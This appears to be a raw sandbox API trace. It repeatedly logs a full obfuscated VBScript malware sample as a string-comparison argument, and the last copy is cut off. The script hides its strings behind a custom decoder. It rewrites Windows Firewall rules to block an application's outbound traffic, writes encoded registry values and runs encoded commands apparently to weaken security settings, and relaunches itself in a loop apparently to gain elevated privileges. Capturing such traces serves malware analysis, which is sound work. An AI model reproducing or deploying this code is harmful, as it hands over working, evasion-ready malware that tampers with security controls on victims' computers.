bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.289] wcsncmp (_String1="\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.289] wcsncmp (_String1="Function bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.289] wcsncmp (_String1="unction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.289] wcsncmp (_String1="nction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = 